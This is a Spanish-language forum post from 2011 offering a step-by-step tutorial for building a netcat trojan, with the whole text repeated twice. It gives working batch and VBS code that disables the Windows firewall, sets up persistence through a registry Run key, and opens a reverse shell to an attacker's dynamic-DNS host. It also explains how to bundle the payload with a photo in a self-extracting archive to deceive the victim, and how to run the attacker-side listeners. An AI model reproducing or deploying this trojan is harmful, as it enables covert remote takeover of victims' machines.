46
Investigación de Malware / TUTO DE TROYANO CON NETCAT PASO A PASO by july
« en: Mayo 17, 2011, 12:59:21 am »
te explico un poco: reverse shell
es cuando la victima se conecta a vos y te da una shell.
el no-ip lo que hace redirigir tu ip dinamica a una direccion dns (yo lo tengo cada 3 segundos)
esto hace que por mas que tu ip cambie, siempre se va asociar a tu dns (ej loquesea.no-ip.org)
ya explicado esto que hacemos con el netcat
hacemos un bat con el nombre vamos.bat
y le ponemos estos comandos: nc.exe hay que copiarselo a la victima en
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
ademas a este bat ponerlo en el registro run, para que?
para que cada vez que se prenda la maquina me lo ejecute
start C:\Extracted\data.exe
ademas hice un vbs para desabilitar el friweall de windows, que es el siguiente codigo:
esto lo guardamos como desa.vbs
tambien en el bat lo hacemos ejecutar
start C:\Extracted\desa.vbs
lo unico que falta poner el comando para conectarnos
bueno el bat quedaria asi:
y el desa.vbs quedaria asi:
ahora despues que tenes eso, al bat lo pasamos a exe con Bat To Exe Converter.exe
luego unimos todo (nc.exe, desa.vbs, vamos.exe)
al unirlo todo ponemos la foto, el vamos.exe y luego lo demas (hay que respetar el orden)
yo uso el programa SFX COMPILER
terminando, en tu maquina pones:
en un bat
ejecutas los dos y esperas la coneccion
antes desabilita tu friweall.
Si lo queres probar antes, en una red local o en una maquina virtual (virtual box) es de la siguiente forma:
en la computadora victima copiar nc.exe en sytem32, luego hacer un bat con el siguiente codigo:
para colocar "|" precional alt + ctrl + 1
Ahora en nuestra maquina desconectar el friwell de windows
luego realizar 2 bat y los mismo colocar un comando:
este es 1
OJO: PRIMERO EJECUTA ESTOS 2 BAT PARA QUE QUEDEN ESCUCHANDO, Y LUEGO EL COMANDO EN LA VICTIMA.
ESPERO QUE LO ENTIENDAS
es cuando la victima se conecta a vos y te da una shell.
el no-ip lo que hace redirigir tu ip dinamica a una direccion dns (yo lo tengo cada 3 segundos)
esto hace que por mas que tu ip cambie, siempre se va asociar a tu dns (ej loquesea.no-ip.org)
ya explicado esto que hacemos con el netcat
hacemos un bat con el nombre vamos.bat
y le ponemos estos comandos: nc.exe hay que copiarselo a la victima en
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
ademas a este bat ponerlo en el registro run, para que?
para que cada vez que se prenda la maquina me lo ejecute
start C:\Extracted\data.exe
ademas hice un vbs para desabilitar el friweall de windows, que es el siguiente codigo:
Código: [Seleccionar]
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = false
esto lo guardamos como desa.vbs
tambien en el bat lo hacemos ejecutar
start C:\Extracted\desa.vbs
lo unico que falta poner el comando para conectarnos
Código: [Seleccionar]
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443
bueno el bat quedaria asi:
Código: [Seleccionar]
@echo off
start C:\Extracted\desa.vbs
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
reg add hklm\software\microsoft\windows\currentversion\run /v wind /t reg_sz /d C:\Extracted\vamos.exe /f
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443
y el desa.vbs quedaria asi:
Código: [Seleccionar]
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = false
ahora despues que tenes eso, al bat lo pasamos a exe con Bat To Exe Converter.exe
luego unimos todo (nc.exe, desa.vbs, vamos.exe)
al unirlo todo ponemos la foto, el vamos.exe y luego lo demas (hay que respetar el orden)
yo uso el programa SFX COMPILER
terminando, en tu maquina pones:
en un bat
Código: [Seleccionar]
nc -vv -l -p 80
en otro bat Código: [Seleccionar]
nc -vv -l -p 443
ejecutas los dos y esperas la coneccion
antes desabilita tu friweall.
Si lo queres probar antes, en una red local o en una maquina virtual (virtual box) es de la siguiente forma:
en la computadora victima copiar nc.exe en sytem32, luego hacer un bat con el siguiente codigo:
Código: [Seleccionar]
nc ip de tu maquina local 80 | cmd.exe | nc ip de tu maquina local 443
para colocar "|" precional alt + ctrl + 1
Ahora en nuestra maquina desconectar el friwell de windows
luego realizar 2 bat y los mismo colocar un comando:
este es 1
Código: [Seleccionar]
nc -vv -l -p 80
este es 2Código: [Seleccionar]
nc -vv -l -p 443
OJO: PRIMERO EJECUTA ESTOS 2 BAT PARA QUE QUEDEN ESCUCHANDO, Y LUEGO EL COMANDO EN LA VICTIMA.
ESPERO QUE LO ENTIENDAS